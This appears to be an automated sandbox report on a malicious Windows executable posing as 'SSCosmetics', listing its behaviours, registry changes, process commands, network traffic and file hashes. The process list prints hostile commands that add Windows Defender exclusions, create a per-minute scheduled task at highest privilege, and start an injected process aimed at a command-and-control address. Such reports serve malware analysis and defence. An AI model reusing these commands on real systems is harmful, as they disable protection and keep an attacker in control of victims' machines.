Analysis Overview
SHA256
1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474
Threat Level: Known bad
The file SSCosmetics (2).exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Checks computer location settings
Executes dropped EXE
Drops startup file
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-07 18:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-07 18:21
Reported
2024-04-07 18:38
Platform
win10v2004-20240226-en
Max time kernel
433s
Max time network
458s
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\System.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\System.exe" | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4404 set thread context of 3828 | N/A | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Windows\explorer.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe
"C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SSCosmetics (2).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SSCosmetics (2).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\System.exe"
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.19 21574 <123456789> DF9D76493D2052CA298B
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff862bf46f8,0x7ff862bf4708,0x7ff862bf4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2200 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2816 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,2909282069065718935,8856823193965412898,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
C:\Users\Admin\System.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | multi-why.gl.at.ply.gg | udp |
| US | 147.185.221.19:21574 | multi-why.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.19:21574 | multi-why.gl.at.ply.gg | tcp |
| US | 147.185.221.19:21574 | multi-why.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 147.185.221.19:21574 | multi-why.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 104.242.123.52.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 94.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 52.168.117.173:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 173.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 13.89.179.12:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 12.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\System.exe
| MD5 | f278e2fb4010c8403c00cf988354a0fd |
| SHA1 | 3c1c63f2f6678cc55deda531413674c9f4b090cf |
| SHA256 | 1fd1e3eceac872dffbc901adfba60312f30068884c2ef3ae8f15d6ce6f7aa474 |
| SHA512 | 85257af5832cb33de94d80544720ae91f2060b63513ddfac9698637531a5c1049dd37c22416fd0d624e6430be2f0c03d436ef4009cb2cab91c087169723da0b9 |
memory/2520-73-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/2520-75-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/5012-79-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/5012-80-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4788-82-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4788-83-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/2692-85-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/2692-86-0x00007FF8665B0000-0x00007FF867071000-memory.dmp
memory/4404-87-0x000000001B480000-0x000000001B496000-memory.dmp
memory/3828-88-0x0000000000400000-0x0000000000410000-memory.dmp
memory/3828-89-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/3828-91-0x00000000053A0000-0x0000000005432000-memory.dmp
memory/3828-90-0x0000000005300000-0x000000000539C000-memory.dmp
memory/3828-92-0x00000000059F0000-0x0000000005F94000-memory.dmp
memory/3828-93-0x00000000056D0000-0x0000000005736000-memory.dmp
memory/960-95-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/960-96-0x0000000004A30000-0x0000000004A40000-memory.dmp
memory/960-94-0x0000000004880000-0x00000000048B6000-memory.dmp
memory/960-97-0x0000000005070000-0x0000000005698000-memory.dmp
memory/960-98-0x0000000004EA0000-0x0000000004EC2000-memory.dmp
memory/960-99-0x0000000005710000-0x0000000005776000-memory.dmp
memory/960-109-0x0000000005860000-0x0000000005BB4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10890cda4b6eab618e926c4118ab0647 |
| SHA1 | 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d |
| SHA256 | 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14 |
| SHA512 | a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221 |
memory/960-111-0x0000000005E40000-0x0000000005E5E000-memory.dmp
memory/960-112-0x0000000005E70000-0x0000000005EBC000-memory.dmp
memory/960-115-0x0000000074FF0000-0x00000000757A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\CrashpadMetrics-active.pma
| MD5 | f9abba11224c1ad45bcdaa95e882842b |
| SHA1 | 1c8bfbcb53d611f72ccc9b80c04eb4a1e45a2400 |
| SHA256 | bb7428477de5d502b5414b3123ae7bcd5aeb61d37da8492318a9a6b45242884b |
| SHA512 | 90a9a486a505a44e012d49104f3d87954f3c729a800939cc9b127f283eafd841db8c019ba30b96ab2ebed0ce4226af2147417b41242de2dc2d600af119345926 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\throttle_store.dat
| MD5 | 9e4e94633b73f4a7680240a0ffd6cd2c |
| SHA1 | e68e02453ce22736169a56fdb59043d33668368f |
| SHA256 | 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304 |
| SHA512 | 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | e0811105475d528ab174dfdb69f935f3 |
| SHA1 | dd9689f0f70a07b4e6fb29607e42d2d5faf1f516 |
| SHA256 | c91388c87878a9e2c530c6096dbdd993b0a26fefe8ad797e0133547225032d6c |
| SHA512 | 8374a721ea3ff3a1ea70d8a074e5c193dbba27ba7e301f19cea89d648b2378c376e48310c33fe81078cd40b1863daec935e8ac22e8e3878dc3a5bb529d028852 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Local State
| MD5 | 8cd20f030c0e52c78f3b2d2bab082f29 |
| SHA1 | e924a0cf42468e929d7f50f43cb3d945b121c748 |
| SHA256 | 298c4855b050a936057d26220ccae2e2ea0a99e352e7d61aa98b1232d954f90b |
| SHA512 | cccbf4d26ae615c26bf22dc5b854b6e3d20669ece2f3ae09df32566c0b1de95f0cfc4a9da1d49cd2fdcf16e6f1905efcaa902188e3de8c8d90e1881738f4358f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Secure Preferences
| MD5 | c57eb69e85f77828ed87a40eae0f7add |
| SHA1 | 4124c4874e5f5383eca737dd26309cb81841352e |
| SHA256 | c5ad6acae43eeb909035ffd0a9a61beb3d3fabbe6ef68eee89d389f5bb829d49 |
| SHA512 | 3398ba1997fe673172b3241b916457adeb0372d1213b6b6fc618492ca725b1135251bb353d00cd101cc381bac5908229a2afdc8d0b1adcd076f1b6cb22e913ac |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Login Data
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Web Data
| MD5 | f70aa3fa04f0536280f872ad17973c3d |
| SHA1 | 50a7b889329a92de1b272d0ecf5fce87395d3123 |
| SHA256 | 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8 |
| SHA512 | 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sessions\Tabs_13353438338878948
| MD5 | 7fcd0f5a1738a220266985ce13fe2239 |
| SHA1 | 925674da29c597c38e117d947b2e2d5b1617fd2f |
| SHA256 | 9cfdfa688fb53570e065b6c5a8429c69b0e2c410d52cc686edeaf90676f7e04b |
| SHA512 | 7ebb1dd239920b630460da580c241ab2ecf08357025da2a40a89ed54d29675b0e99e88707c89d0a0d8af885204f90ff02caa7b42aac12b91adb6931275847240 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat
| MD5 | 47b2c6613360b818825d076d14c051f7 |
| SHA1 | 7df7304568313a06540f490bf3305cb89bc03e5c |
| SHA256 | 47a22bea2e7d0154c59bf5d8790ec68274eb05e9fa6cf0eab0d648121f1a02ac |
| SHA512 | 08d2366fc1ce87dbe96b9bf997e4c59c9206fcfea47c1f17b01e79aeb0580f25cac5c7349bb453a50775b2743053446653f4129f835f81f4a8547ca392557aac |
\??\pipe\LOCAL\crashpad_1932_ULJUGVYXBNEYDNLX
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\000003.log
| MD5 | 148079685e25097536785f4536af014b |
| SHA1 | c5ff5b1b69487a9dd4d244d11bbafa91708c1a41 |
| SHA256 | f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8 |
| SHA512 | c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\000003.log
| MD5 | 90881c9c26f29fca29815a08ba858544 |
| SHA1 | 06fee974987b91d82c2839a4bb12991fa99e1bdd |
| SHA256 | a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a |
| SHA512 | 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625 |
